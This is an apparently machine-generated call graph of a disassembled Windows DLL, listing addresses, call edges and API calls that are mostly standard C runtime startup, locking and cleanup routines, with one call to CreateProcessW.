8306->8315 8516 6f9590c5 8312->8516 8316 6f956583 8315->8316 8317 6f95657d 8315->8317 8319 6f9593f6 _unexpected 6 API calls 8316->8319 8321 6f956587 SetLastError 8316->8321 8318 6f9593b7 _unexpected 6 API calls 8317->8318 8318->8316 8320 6f95659f 8319->8320 8320->8321 8323 6f9578b8 _unexpected 14 API calls 8320->8323 8324 6f956617 8321->8324 8325 6f95661c 8321->8325 8326 6f9565b4 8323->8326 8342 6f959f58 8324->8342 8350 6f95609a 8325->8350 8328 6f9565cd 8326->8328 8329 6f9565bc 8326->8329 8330 6f9593f6 _unexpected 6 API calls 8328->8330 8332 6f9593f6 _unexpected 6 API calls 8329->8332 8333 6f9565d9 8330->8333 8339 6f9565ca 8332->8339 8334 6f9565f4 8333->8334 8335 6f9565dd 8333->8335 8338 6f956369 _unexpected 14 API calls 8334->8338 8336 6f9593f6 _unexpected 6 API calls 8335->8336 8336->8339 8337 6f956a8e __freea 14 API calls 8337->8321 8340 6f9565ff 8338->8340 8339->8337 8341 6f956a8e __freea 14 API calls 8340->8341 8341->8321 8343 6f957714 8342->8343 8344 6f959f6b 8342->8344 8346 6f959fb6 8343->8346 8344->8343 8473 6f95a439 8344->8473 8347 6f959fde 8346->8347 8348 6f959fc9 8346->8348 8347->8305 8348->8347 8495 6f95871f 8348->8495 8361 6f9598d3 8350->8361 8353 6f9560aa 8355 6f9560b4 IsProcessorFeaturePresent 8353->8355 8356 6f9560d3 8353->8356 8357 6f9560c0 8355->8357 8397 6f95535e 8356->8397 8391 6f954d54 8357->8391 8400 6f959801 8361->8400 8364 6f959918 8366 6f959924 CallCatchBlock 8364->8366 8365 6f9566b8 __dosmaperr 14 API calls 8373 6f959955 CallUnexpected 8365->8373 8366->8365 8367 6f959974 8366->8367 8369 6f959986 CallUnexpected 8366->8369 8366->8373 8368 6f956a7b __dosmaperr 14 API calls 8367->8368 8371 6f959979 8368->8371 8370 6f9599bc CallUnexpected 8369->8370 8411 6f956933 EnterCriticalSection 8369->8411 8376 6f959af6 8370->8376 8377 6f9599f9 8370->8377 8387 6f959a27 8370->8387 8374 6f954f50 __strnicoll 39 API calls 8371->8374 8373->8367 8373->8369 8390 6f95995e 8373->8390 8374->8390 8378 6f959b01 8376->8378 8416 6f95697b LeaveCriticalSection 8376->8416 8383 6f956567 _unexpected 39 API calls 8377->8383 8377->8387 8381 6f95535e CallUnexpected 21 API calls 8378->8381 8382 6f959b09 8381->8382 8384 6f959a1c 8383->8384 8386 6f956567 _unexpected 39 API calls 8384->8386 8385 6f956567 _unexpected 39 API calls 8388 6f959a7c 8385->8388 8386->8387 8412 6f959aa2 8387->8412 8389 6f956567 _unexpected 39 API calls 8388->8389 8388->8390 8389->8390 8390->8353 8392 6f954d70 CallUnexpected 8391->8392 8393 6f954d9c IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 8392->8393 8394 6f954e6d CallUnexpected 8393->8394 8395 6f951cf9 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 8394->8395 8396 6f954e8b 8395->8396 8396->8356 8418 6f95519b 8397->8418 8401 6f95980d CallCatchBlock 8400->8401 8406 6f956933 EnterCriticalSection 8401->8406 8403 6f95981b 8407 6f95985d 8403->8407 8406->8403 8410 6f95697b LeaveCriticalSection 8407->8410 8409 6f95609f 8409->8353 8409->8364 8410->8409 8411->8370 8413 6f959aa6 8412->8413 8414 6f959a6e 8412->8414 8417 6f95697b LeaveCriticalSection 8413->8417 8414->8385 8414->8388 8414->8390 8416->8378 8417->8414 8419 6f9551c8 8418->8419 8420 6f9551da 8418->8420 8445 6f955263 GetModuleHandleW 8419->8445 8430 6f95504b 8420->8430 8425 6f955217 8429 6f95522c 8431 6f955057 CallCatchBlock 8430->8431 8453 6f956933 EnterCriticalSection 8431->8453 8433 6f955061 8454 6f9550b3 8433->8454 8435 6f95506e 8458 6f95508c 8435->8458 8438 6f955232 8466 6f9552a5 8438->8466 8440 6f95523c 8441 6f955250 8440->8441 8442 6f955240 GetCurrentProcess TerminateProcess 8440->8442 8443 6f9552be CallUnexpected 3 API calls 8441->8443 8442->8441 8444 6f955258 ExitProcess 8443->8444 8446 6f9551cd 8445->8446 8446->8420 8447 6f9552be GetModuleHandleExW 8446->8447 8448 6f9552fd GetProcAddress 8447->8448 8449 6f95531e 8447->8449 8448->8449 8452 6f955311 8448->8452 8450 6f955324 FreeLibrary 8449->8450 8451 6f9551d9 8449->8451 8450->8451 8451->8420 8452->8449 8453->8433 8456 6f9550bf CallUnexpected CallCatchBlock 8454->8456 8455 6f955123 CallUnexpected 8455->8435 8456->8455 8461 6f955e19 8456->8461 8465 6f95697b LeaveCriticalSection 8458->8465 8460 6f95507a 8460->8425 8460->8438 8462 6f955e25 __EH_prolog3 8461->8462 8463 6f955ce4 __DllMainCRTStartup@12 14 API calls 8462->8463 8464 6f955e4c __DllMainCRTStartup@12 8463->8464 8464->8455 8465->8460 8469 6f9569b7 8466->8469 8468 6f9552aa CallUnexpected 8468->8440 8470 6f9569c6 CallUnexpected 8469->8470 8471 6f9569d3 8470->8471 8472 6f95927d CallUnexpected 5 API calls 8470->8472 8471->8468 8472->8471 8474 6f95a445 CallCatchBlock 8473->8474 8475 6f956567 _unexpected 39 API calls 8474->8475 8476 6f95a44e 8475->8476 8483 6f95a494 8476->8483 8486 6f956933 EnterCriticalSection 8476->8486 8478 6f95a46c 8487 6f95a4ba 8478->8487 8483->8343 8484 6f95609a CallUnexpected 39 API calls 8485 6f95a4b9 8484->8485 8486->8478 8488 6f95a47d 8487->8488 8489 6f95a4c8 __strnicoll 8487->8489 8491 6f95a499 8488->8491 8489->8488 8490 6f95a1ed __strnicoll 14 API calls 8489->8490 8490->8488 8494 6f95697b LeaveCriticalSection 8491->8494 8493 6f95a490 8493->8483 8493->8484 8494->8493 8496 6f956567 _unexpected 39 API calls 8495->8496 8497 6f958724 8496->8497 8500 6f958637 8497->8500 8501 6f958643 CallCatchBlock 8500->8501 8502 6f95865d 8501->8502 8511 6f956933 EnterCriticalSection 8501->8511 8504 6f958664 8502->8504 8507 6f95609a CallUnexpected 39 API calls 8502->8507 8504->8347 8505 6f958699 8512 6f9586b6 8505->8512 8509 6f9586d6 8507->8509 8508 6f95866d 8508->8505 8510 6f956a8e __freea 14 API calls 8508->8510 8510->8505 8511->8508 8515 6f95697b LeaveCriticalSection 8512->8515 8514 6f9586bd 8514->8502 8515->8514 8517 6f9591f8 _unexpected 5 API calls 8516->8517 8518 6f9590db 8517->8518 8518->8092 8520 6f9575fe 8519->8520 8521 6f957618 8519->8521 8537 6f957780 8520->8537 8523 6f95763e 8521->8523 8524 6f95761f 8521->8524 8546 6f958ad1 8523->8546 8536 6f957608 8524->8536 8541 6f95779a 8524->8541 8527 6f95764d 8528 6f957654 GetLastError 8527->8528 8530 6f95767a 8527->8530 8532 6f95779a 15 API calls 8527->8532 8529 6f956a21 __dosmaperr 14 API calls 8528->8529 8531 6f957660 8529->8531 8533 6f958ad1 __strnicoll MultiByteToWideChar 8530->8533 8530->8536 8534 6f956a7b __dosmaperr 14 API calls 8531->8534 8532->8530 8535 6f957691 8533->8535 8534->8536 8535->8528 8535->8536 8536->7955 8536->7956 8538 6f957793 8537->8538 8539 6f95778b 8537->8539 8538->8536 8540 6f956a8e __freea 14 API calls 8539->8540 8540->8538 8542 6f957780 14 API calls 8541->8542 8543 6f9577a8 8542->8543 8549 6f9577d9 8543->8549 8573 6f958a39 8546->8573 8552 6f95786a 8549->8552 8553 6f9578a8 8552->8553 8554 6f957878 _unexpected 8552->8554 8555 6f956a7b __dosmaperr 14 API calls 8553->8555 8554->8553 8556 6f957893 HeapAlloc 8554->8556 8559 6f9554c6 8554->8559 8557 6f9577b9 8555->8557 8556->8554 8556->8557 8557->8536 8562 6f9554f2 8559->8562 8563 6f9554fe CallCatchBlock 8562->8563 8568 6f956933 EnterCriticalSection 8563->8568 8565 6f955509 CallUnexpected 8569 6f955540 8565->8569 8568->8565 8572 6f95697b LeaveCriticalSection 8569->8572 8571 6f9554d1 8571->8554 8572->8571 8574 6f958a4a MultiByteToWideChar 8573->8574 8574->8527 8599 6f956c5b 8575->8599 8579 6f957741 39 API calls 8578->8579 8580 6f95ae5d 8579->8580 8581 6f9576a2 17 API calls 8580->8581 8582 6f95ae6a 8581->8582 8583 6f95aed1 8582->8583 8585 6f957741 39 API calls 8582->8585 8584 6f95aedd 8583->8584 8586 6f956a8e __freea 14 API calls 8583->8586 8587 6f95aeec 8584->8587 8590 6f956a8e __freea 14 API calls 8584->8590 8588 6f95ae76 8585->8588 8586->8584 8589 6f956fbd 8587->8589 8592 6f956a8e __freea 14 API calls 8587->8592 8591 6f9576a2 17 API calls 8588->8591 8589->7988 8589->7990 8589->7991 8590->8587 8593 6f95ae83 8591->8593 8592->8589 8593->8583 8594 6f95aead CreateProcessW 8593->8594 8595 6f957741 39 API calls 8593->8595 8594->8583 8596 6f95ae94 8595->8596 8597 6f9576a2 17 API calls 8596->8597 8598 6f95aea1 8597->8598 8598->8583 8598->8594 8600 6f956c67 CallCatchBlock 8599->8600 8607 6f956933 EnterCriticalSection 8600->8607 8602 6f956c75 8608 6f9570b7 8602->8608 8607->8602 8609 6f9570e0 8608->8609 8610 6f95710c 8609->8610 8611 6f95711e 8609->8611 8612 6f956a7b __dosmaperr 14 API calls 8610->8612 8613 6f9578b8 _unexpected 14 API calls 8611->8613 8614 6f956c82 8612->8614 8615 6f957132 8613->8615 8620 6f956caa 8614->8620 8616 6f956a7b __dosmaperr 14 API calls 8615->8616 8618 6f957140 8615->8618 8616->8618 8617 6f956a8e __freea 14 API calls 8619 6f9571e5 8617->8619 8618->8617 8619->8614 8623 6f95697b LeaveCriticalSection 8620->8623 8622 6f956c93 8622->7976 8622->7977 8623->8622 8625 6f954eae _Deallocate 8624->8625 8630 6f954ed3 8625->8630 8631 6f954ee3 8630->8631 8632 6f954eea 8630->8632 8645 6f954cf1 GetLastError 8631->8645 8635 6f954ec6 8632->8635 8649 6f954cc8 8632->8649 8639 6f954c8c 8635->8639 8636 6f954f1f 8636->8635 8637 6f954f7d _Deallocate 11 API calls 8636->8637 8638 6f954f4f 8637->8638 8640 6f954c98 8639->8640 8641 6f954caf 8640->8641 8674 6f954d37 8640->8674 8643 6f954cc2 8641->8643 8644 6f954d37 _Deallocate 39 API calls 8641->8644 8643->7921 8644->8643 8646 6f954d0a 8645->8646 8652 6f956769 8646->8652 8650 6f954cd3 GetLastError SetLastError 8649->8650 8651 6f954cec 8649->8651 8650->8636 8651->8636 8653 6f956782 8652->8653 8654 6f95677c 8652->8654 8656 6f9593f6 _unexpected 6 API calls 8653->8656 8658 6f954d22 SetLastError 8653->8658 8655 6f9593b7 _unexpected 6 API calls 8654->8655 8655->8653 8657 6f95679c 8656->8657 8657->8658 8659 6f9578b8 _unexpected 14 API calls 8657->8659 8658->8632 8660 6f9567ac 8659->8660 8661 6f9567b4 8660->8661 8662 6f9567c9 8660->8662 8663 6f9593f6 _unexpected 6 API calls 8661->8663 8664 6f9593f6 _unexpected 6 API calls 8662->8664 8665 6f9567c0 8663->8665 8666 6f9567d5 8664->8666 8670 6f956a8e __freea 14 API calls 8665->8670 8667 6f9567d9 8666->8667 8668 6f9567e8 8666->8668 8671 6f9593f6 _unexpected 6 API calls 8667->8671 8669 6f956369 _unexpected 14 API calls 8668->8669 8672 6f9567f3 8669->8672 8670->8658 8671->8665 8673 6f956a8e __freea 14 API calls 8672->8673 8673->8658 8675 6f954d41 8674->8675 8676 6f954d4a 8674->8676 8677 6f954cf1 _Deallocate 16 API calls 8675->8677 8676->8641 8678 6f954d46 8677->8678 8678->8676 8679 6f95609a CallUnexpected 39 API calls 8678->8679 8680 6f954d53 8679->8680 8990 6f951d2a 8991 6f951d35 8990->8991 8992 6f951d68 8990->8992 8994 6f951d5a 8991->8994 8995 6f951d3a 8991->8995 9029 6f951e84 8992->9029 9002 6f951d7d 8994->9002 8997 6f951d50 8995->8997 8998 6f951d3f 8995->8998 9021 6f95237c 8997->9021 9001 6f951d44 8998->9001 9016 6f95239b 8998->9016 9003 6f951d89 CallCatchBlock 9002->9003 9052 6f95240c 9003->9052 9005 6f951d90 __DllMainCRTStartup@12 9006 6f951db7 9005->9006 9007 6f951e7c 9005->9007 9014 6f951df3 ___scrt_is_nonwritable_in_current_image CallUnexpected 9005->9014 9063 6f95236e 9006->9063 9071 6f9525ab IsProcessorFeaturePresent 9007->9071 9010 6f951e83 9011 6f951dc6 __RTC_Initialize 9011->9014 9066 6f95228c InitializeSListHead 9011->9066 9013 6f951dd4 9013->9014 9067 6f952343 9013->9067 9014->9001 9165 6f955fba 9016->9165 9254 6f9531ec 9021->9254 9024 6f952385 9024->9001 9027 6f952398 9027->9001 9028 6f9531f7 21 API calls 9028->9024 9031 6f951e90 CallCatchBlock __DllMainCRTStartup@12 9029->9031 9030 6f951e99 9030->9001 9031->9030 9032 6f951ec1 9031->9032 9033 6f951f2c 9031->9033 9274 6f9523dc 9032->9274 9034 6f9525ab __DllMainCRTStartup@12 4 API calls 9033->9034 9038 6f951f33 CallCatchBlock 9034->9038 9036 6f951ec6 9283 6f952298 9036->9283 9039 6f951f4f 9038->9039 9040 6f951f69 dllmain_raw 9038->9040 9048 6f951f64 __DllMainCRTStartup@12 9038->9048 9039->9001 9040->9039 9042 6f951f83 dllmain_crt_dispatch 9040->9042 9041 6f951ecb __RTC_Initialize __DllMainCRTStartup@12 9286 6f95257d 9041->9286 9042->9039 9042->9048 9046 6f951fde dllmain_crt_dispatch 9046->9039 9049 6f951ff1 dllmain_raw 9046->9049 9047 6f951fd5 9047->9039 9047->9046 9048->9047 9050 6f951e84 __DllMainCRTStartup@12 81 API calls 9048->9050 9049->9039 9051 6f951fca dllmain_raw 9050->9051 9051->9047 9053 6f952415 9052->9053 9075 6f952778 IsProcessorFeaturePresent 9053->9075 9057 6f952426 9058 6f95242a 9057->9058 9085 6f955f9d 9057->9085 9058->9005 9061 6f952441 9061->9005 9159 6f952445 9063->9159 9065 6f952375 9065->9011 9066->9013 9068 6f952348 ___scrt_release_startup_lock 9067->9068 9069 6f952351 9068->9069 9070 6f952778 IsProcessorFeaturePresent 9068->9070 9069->9014 9070->9069 9072 6f9525c1 CallUnexpected 9071->9072 9073 6f95266c IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 9072->9073 9074 6f9526b7 CallUnexpected 9073->9074 9074->9010 9076 6f952421 9075->9076 9077 6f9531cd 9076->9077 9094 6f953807 9077->9094 9081 6f9531de 9082 6f9531e9 9081->9082 9108 6f953843 9081->9108 9082->9057 9084 6f9531d6 9084->9057 9150 6f959768 9085->9150 9088 6f953202 9089 6f953215 9088->9089 9090 6f95320b 9088->9090 9089->9058 9091 6f9537ec ___vcrt_uninitialize_ptd 6 API calls 9090->9091 9092 6f953210 9091->9092 9093 6f953843 ___vcrt_uninitialize_locks DeleteCriticalSection 9092->9093 9093->9089 9096 6f953810 9094->9096 9097 6f953839 9096->9097 9098 6f9531d2 9096->9098 9112 6f953e3b 9096->9112 9099 6f953843 ___vcrt_uninitialize_locks DeleteCriticalSection 9097->9099 9098->9084 9100 6f9537b9 9098->9100 9099->9098 9131 6f953d4c 9100->9131 9103 6f9537ce 9103->9081 9106 6f9537e9 9106->9081 9109 6f95386d 9108->9109 9110 6f95384e 9108->9110 9109->9084 9111 6f953858 DeleteCriticalSection 9110->9111 9111->9109 9111->9111 9117 6f953d03 9112->9117 9115 6f953e73 InitializeCriticalSectionAndSpinCount 9116 6f953e5e 9115->9116 9116->9096 9118 6f953d1b 9117->9118 9119 6f953d3e 9117->9119 9118->9119 9123 6f953c69 9118->9123 9119->9115 9119->9116 9122 6f953d30 GetProcAddress 9122->9119 9129 6f953c75 ___vcrt_FlsFree 9123->9129 9124 6f953ce9 9124->9119 9124->9122 9125 6f953c8b LoadLibraryExW 9126 6f953cf0 9125->9126 9127 6f953ca9 GetLastError 9125->9127 9126->9124 9128 6f953cf8 FreeLibrary 9126->9128 9127->9129 9128->9124 9129->9124 9129->9125 9130 6f953ccb LoadLibraryExW 9129->9130 9130->9126 9130->9129 9132 6f953d03 ___vcrt_FlsFree 5 API calls 9131->9132 9133 6f953d66 9132->9133 9134 6f953d7f TlsAlloc 9133->9134 9135 6f9537c3 9133->9135 9135->9103 9136 6f953dfd 9135->9136 9137 6f953d03 ___vcrt_FlsFree 5 API calls 9136->9137 9138 6f953e17 9137->9138 9139 6f953e32 TlsSetValue 9138->9139 9140 6f9537dc 9138->9140 9139->9140 9140->9106 9141 6f9537ec 9140->9141 9142 6f9537fc 9141->9142 9143 6f9537f6 9141->9143 9142->9103 9145 6f953d87 9143->9145 9146 6f953d03 ___vcrt_FlsFree 5 API calls 9145->9146 9147 6f953da1 9146->9147 9148 6f953db9 TlsFree 9147->9148 9149 6f953dad 9147->9149 9148->9149 9149->9142 9151 6f959778 9150->9151 9152 6f952433 9150->9152 9151->9152 9154 6f95962c 9151->9154 9152->9061 9152->9088 9155 6f959633 9154->9155 9156 6f959676 GetStdHandle 9155->9156 9157 6f9596d8 9155->9157 9158 6f959689 GetFileType 9155->9158 9156->9155 9157->9151 9158->9155 9160 6f952455 9159->9160 9161 6f952451 9159->9161 9162 6f9525ab __DllMainCRTStartup@12 4 API calls 9160->9162 9164 6f952462 ___scrt_release_startup_lock 9160->9164 9161->9065 9163 6f9524cb 9162->9163 9164->9065 9171 6f95653b 9165->9171 9168 6f9531f7 9237 6f9536e3 9168->9237 9172 6f956545 9171->9172 9174 6f9523a0 9171->9174 9173 6f9593b7 _unexpected 6 API calls 9172->9173 9175 6f95654c 9173->9175 9174->9168 9175->9174 9176 6f9593f6 _unexpected 6 API calls 9175->9176 9177 6f95655f 9176->9177 9179 6f956402 9177->9179 9180 6f95640d 9179->9180 9181 6f95641d 9179->9181 9185 6f956423 9180->9185 9181->9174 9184 6f956a8e __freea 14 API calls 9184->9181 9186 6f95643e 9185->9186 9187 6f956438 9185->9187 9189 6f956a8e __freea 14 API calls 9186->9189 9188 6f956a8e __freea 14 API calls 9187->9188 9188->9186 9190 6f95644a 9189->9190 9191 6f956a8e __freea 14 API calls 9190->9191 9192 6f956455 9191->9192 9193 6f956a8e __freea 14 API calls 9192->9193 9194 6f956460 9193->9194 9195 6f956a8e __freea 14 API calls 9194->9195 9196 6f95646b 9195->9196 9197 6f956a8e __freea 14 API calls 9196->9197 9198 6f956476 9197->9198 9199 6f956a8e __freea 14 API calls 9198->9199 9200 6f956481 9199->9200 9201 6f956a8e __freea 14 API calls 9200->9201 9202 6f95648c 9201->9202 9203 6f956a8e __freea 14 API calls 9202->9203 9204 6f956497 9203->9204 9205 6f956a8e __freea 14 API calls 9204->9205 9206 6f9564a5 9205->9206 9211 6f95624f 9206->9211 9212 6f95625b CallCatchBlock 9211->9212 9227 6f956933 EnterCriticalSection 9212->9227 9214 6f95628f 9228 6f9562ae 9214->9228 9216 6f956265 9216->9214 9218 6f956a8e __freea 14 API calls 9216->9218 9218->9214 9219 6f9562ba 9220 6f9562c6 CallCatchBlock 9219->9220 9232 6f956933 EnterCriticalSection 9220->9232 9222 6f9562d0 9223 6f9564f0 _unexpected 14 API calls 9222->9223 9224 6f9562e3 9223->9224 9233 6f956303 9224->9233 9227->9216 9231 6f95697b LeaveCriticalSection 9228->9231 9230 6f95629c 9230->9219 9231->9230 9232->9222 9236 6f95697b LeaveCriticalSection 9233->9236 9235 6f9562f1 9235->9184 9236->9235 9238 6f9536f0 9237->9238 9244 6f9523a5 9237->9244 9239 6f9536fe 9238->9239 9245 6f953dc2 9238->9245 9241 6f953dfd ___vcrt_FlsSetValue 6 API calls 9239->9241 9242 6f95370e 9241->9242 9250 6f9536c7 9242->9250 9244->9001 9246 6f953d03 ___vcrt_FlsFree 5 API calls 9245->9246 9247 6f953ddc 9246->9247 9248 6f953df4 TlsGetValue 9247->9248 9249 6f953de8 9247->9249 9248->9249 9249->9239 9251 6f9536d1 9250->9251 9252 6f9536de 9250->9252 9251->9252 9253 6f9555ad ___vcrt_freefls@4 14 API calls 9251->9253 9252->9244 9253->9252 9260 6f953727 9254->9260 9256 6f952381 9256->9024 9257 6f955faf 9256->9257 9258 6f9566b8 __dosmaperr 14 API calls 9257->9258 9259 6f95238d 9258->9259 9259->9027 9259->9028 9261 6f953730 9260->9261 9262 6f953733 GetLastError 9260->9262 9261->9256 9263 6f953dc2 ___vcrt_FlsGetValue 6 API calls 9262->9263 9264 6f953748 9263->9264 9265 6f9537ad SetLastError 9264->9265 9266 6f953dfd ___vcrt_FlsSetValue 6 API calls 9264->9266 9273 6f953767 9264->9273 9265->9256 9267 6f953761 CallUnexpected 9266->9267 9269 6f953dfd ___vcrt_FlsSetValue 6 API calls 9267->9269 9271 6f953789 9267->9271 9267->9273 9268 6f953dfd ___vcrt_FlsSetValue 6 API calls 9270 6f95379d 9268->9270 9269->9271 9272 6f9555ad ___vcrt_freefls@4 14 API calls 9270->9272 9271->9268 9271->9270 9272->9273 9273->9265 9275 6f9523e1 ___scrt_release_startup_lock 9274->9275 9276 6f9523e5 9275->9276 9278 6f9523f1 __DllMainCRTStartup@12 9275->9278 9277 6f955e19 __DllMainCRTStartup@12 14 API calls 9276->9277 9279 6f9523ef 9277->9279 9280 6f9523fe 9278->9280 9281 6f95519b CallUnexpected 21 API calls 9278->9281 9279->9036 9280->9036 9282 6f95535a 9281->9282 9282->9036 9295 6f9531aa InterlockedFlushSList 9283->9295 9287 6f952589 9286->9287 9291 6f951eea 9287->9291 9299 6f955fc2 9287->9299 9289 6f952597 9290 6f953202 ___scrt_uninitialize_crt 7 API calls 9289->9290 9290->9291 9292 6f951f26 9291->9292 9397 6f9523ff 9292->9397 9296 6f9522a2 9295->9296 9297 6f9531ba 9295->9297 9296->9041 9297->9296 9298 6f9555ad ___vcrt_freefls@4 14 API calls 9297->9298 9298->9297 9300 6f955fcd 9299->9300 9303 6f955fdf ___scrt_uninitialize_crt 9299->9303 9301 6f955fdb 9300->9301 9304 6f959e13 9300->9304 9301->9289 9303->9289 9307 6f959ca4 9304->9307 9310 6f959bf8 9307->9310 9311 6f959c04 CallCatchBlock 9310->9311 9318 6f956933 EnterCriticalSection 9311->9318 9313 6f959c0e ___scrt_uninitialize_crt 9314 6f959c7a 9313->9314 9319 6f959b6c 9313->9319 9327 6f959c98 9314->9327 9318->9313 9320 6f959b78 CallCatchBlock 9319->9320 9330 6f959f30 EnterCriticalSection 9320->9330 9322 6f959b82 ___scrt_uninitialize_crt 9323 6f959bbb 9322->9323 9331 6f959dae 9322->9331 9344 6f959bec 9323->9344 9396 6f95697b LeaveCriticalSection 9327->9396 9329 6f959c86 9329->9301 9330->9322 9332 6f959dc3 _Deallocate 9331->9332 9333 6f959dd5 9332->9333 9334 6f959dca 9332->9334 9347 6f959d45 9333->9347 9335 6f959ca4 ___scrt_uninitialize_crt 68 API calls 9334->9335 9338 6f959dd0 9335->9338 9339 6f954c8c _Deallocate 39 API calls 9338->9339 9341 6f959e0d 9339->9341 9341->9323 9342 6f959df6 9360 6f95bd79 9342->9360 9395 6f959f44 LeaveCriticalSection 9344->9395 9346 6f959bda 9346->9313 9348 6f959d5e 9347->9348 9352 6f959d85 9347->9352 9349 6f95a149 ___scrt_uninitialize_crt 39 API calls 9348->9349 9348->9352 9350 6f959d7a 9349->9350 9371 6f95c598 9350->9371 9352->9338 9353 6f95a149 9352->9353 9354 6f95a155 9353->9354 9355 6f95a16a 9353->9355 9356 6f956a7b __dosmaperr 14 API calls 9354->9356 9355->9342 9357 6f95a15a 9356->9357 9358 6f954f50 __strnicoll 39 API calls 9357->9358 9359 6f95a165 9358->9359 9359->9342 9361 6f95bd8a 9360->9361 9364 6f95bd97 9360->9364 9362 6f956a7b __dosmaperr 14 API calls 9361->9362 9370 6f95bd8f 9362->9370 9363 6f95bde0 9365 6f956a7b __dosmaperr 14 API calls 9363->9365 9364->9363 9366 6f95bdbe 9364->9366 9367 6f95bde5 9365->9367 9382 6f95bcd7 9366->9382 9369 6f954f50 __strnicoll 39 API calls 9367->9369 9369->9370 9370->9338 9374 6f95c5a4 CallCatchBlock 9371->9374 9372 6f95c5ac 9372->9352 9373 6f95c5e5 9376 6f954ed3 _Deallocate 29 API calls 9373->9376 9374->9372 9374->9373 9375 6f95c62b 9374->9375 9377 6f95bb96 ___scrt_uninitialize_crt EnterCriticalSection 9375->9377 9376->9372 9378 6f95c631 9377->9378 9379 6f95c64f 9378->9379 9380 6f95c6a9 ___scrt_uninitialize_crt 62 API calls 9378->9380 9381 6f95c6a1 ___scrt_uninitialize_crt LeaveCriticalSection 9379->9381 9380->9379 9381->9372 9383 6f95bce3 CallCatchBlock 9382->9383 9384 6f95bb96 ___scrt_uninitialize_crt EnterCriticalSection 9383->9384 9385 6f95bcf2 9384->9385 9386 6f95bd37 9385->9386 9388 6f95bc6d ___scrt_uninitialize_crt 39 API calls 9385->9388 9387 6f956a7b __dosmaperr 14 API calls 9386->9387 9389 6f95bd3e 9387->9389 9390 6f95bd1e FlushFileBuffers 9388->9390 9392 6f95bd6d ___scrt_uninitialize_crt LeaveCriticalSection 9389->9392 9390->9389 9391 6f95bd2a GetLastError 9390->9391 9393 6f956a68 __dosmaperr 14 API calls 9391->9393 9394 6f95bd56 9392->9394 9393->9386 9394->9370 9395->9346 9396->9329 9402 6f955ff2 9397->9402 9400 6f9537ec ___vcrt_uninitialize_ptd 6 API calls 9401 6f951f2b 9400->9401 9401->9030 9405 6f956838 9402->9405 9406 6f956842 9405->9406 9407 6f952406 9405->9407 9409 6f959378 9406->9409 9407->9400 9410 6f9591f8 _unexpected 5 API calls 9409->9410 9411 6f959394 9410->9411 9412 6f9593af TlsFree 9411->9412 9413 6f95939d 9411->9413 9413->9407 9841 6f9596dc 9842 6f9596e8 CallCatchBlock 9841->9842 9853 6f956933 EnterCriticalSection 9842->9853 9844 6f9596ef 9854 6f95baf8 9844->9854 9847 6f95970d 9873 6f959733 9847->9873 9852 6f95962c 2 API calls 9852->9847 9853->9844 9855 6f95bb04 CallCatchBlock 9854->9855 9856 6f95bb0d 9855->9856 9857 6f95bb2e 9855->9857 9859 6f956a7b __dosmaperr 14 API calls 9856->9859 9876 6f956933 EnterCriticalSection 9857->9876 9861 6f95bb12 9859->9861 9860 6f95bb3a 9866 6f95bb66 9860->9866 9877 6f95ba48 9860->9877 9862 6f954f50 __strnicoll 39 API calls 9861->9862 9863 6f9596fe 9862->9863 9863->9847 9867 6f959576 GetStartupInfoW 9863->9867 9884 6f95bb8d 9866->9884 9868 6f959593 9867->9868 9870 6f959627 9867->9870 9869 6f95baf8 40 API calls 9868->9869 9868->9870 9871 6f9595bb 9869->9871 9870->9852 9871->9870 9872 6f9595eb GetFileType 9871->9872 9872->9871 9893 6f95697b LeaveCriticalSection 9873->9893 9875 6f95971e 9876->9860 9878 6f9578b8 _unexpected 14 API calls 9877->9878 9883 6f95ba5a 9878->9883 9879 6f95ba67 9880 6f956a8e __freea 14 API calls 9879->9880 9881 6f95babc 9880->9881 9881->9860 9883->9879 9887 6f959438 9883->9887 9892 6f95697b LeaveCriticalSection 9884->9892 9886 6f95bb94 9886->9863 9888 6f9591f8 _unexpected 5 API calls 9887->9888 9889 6f959454 9888->9889 9890 6f959472 InitializeCriticalSectionAndSpinCount 9889->9890 9891 6f95945d 9889->9891 9890->9891 9891->9883 9892->9886 9893->9875 10036 6f9568cb 10039 6f956852 10036->10039 10040 6f95685e CallCatchBlock 10039->10040 10047 6f956933 EnterCriticalSection 10040->10047 10042 6f956896 10048 6f9568b4 10042->10048 10043 6f956868 10043->10042 10045 6f95a4ba __strnicoll 14 API calls 10043->10045 10045->10043 10047->10043 10051 6f95697b LeaveCriticalSection 10048->10051 10050 6f9568a2 10051->10050 10355 6f959ee4 10356 6f959e13 ___scrt_uninitialize_crt 68 API calls 10355->10356 10357 6f959eec 10356->10357 10365 6f95c8c5 10357->10365 10359 6f959ef1 10375 6f95c970 10359->10375 10362 6f959f1b 10363 6f956a8e __freea 14 API calls 10362->10363 10364 6f959f26 10363->10364 10366 6f95c8d1 CallCatchBlock 10365->10366 10379 6f956933 EnterCriticalSection 10366->10379 10368 6f95c948 10386 6f95c967 10368->10386 10369 6f95c8dc 10369->10368 10371 6f95c91c DeleteCriticalSection 10369->10371 10380 6f95d210 10369->10380 10374 6f956a8e __freea 14 API calls 10371->10374 10374->10369 10376 6f95c987 10375->10376 10378 6f959f00 DeleteCriticalSection 10375->10378 10377 6f956a8e __freea 14 API calls 10376->10377 10376->10378 10377->10378 10378->10359 10378->10362 10379->10369 10381 6f95d223 _Deallocate 10380->10381 10389 6f95d0eb 10381->10389 10383 6f95d22f 10384 6f954c8c _Deallocate 39 API calls 10383->10384 10385 6f95d23b 10384->10385 10385->10369 10474 6f95697b LeaveCriticalSection 10386->10474 10388 6f95c954 10388->10359 10390 6f95d0f7 CallCatchBlock 10389->10390 10391 6f95d124 10390->10391 10392 6f95d101 10390->10392 10399 6f95d11c 10391->10399 10400 6f959f30 EnterCriticalSection 10391->10400 10393 6f954ed3 _Deallocate 29 API calls 10392->10393 10393->10399 10395 6f95d142 10401 6f95d182 10395->10401 10397 6f95d14f 10415 6f95d17a 10397->10415 10399->10383 10400->10395 10402 6f95d18f 10401->10402 10403 6f95d1b2 10401->10403 10404 6f954ed3 _Deallocate 29 API calls 10402->10404 10405 6f959d45 ___scrt_uninitialize_crt 64 API calls 10403->10405 10406 6f95d1aa 10403->10406 10404->10406 10407 6f95d1ca 10405->10407 10406->10397 10408 6f95c970 14 API calls 10407->10408 10409 6f95d1d2 10408->10409 10410 6f95a149 ___scrt_uninitialize_crt 39 API calls 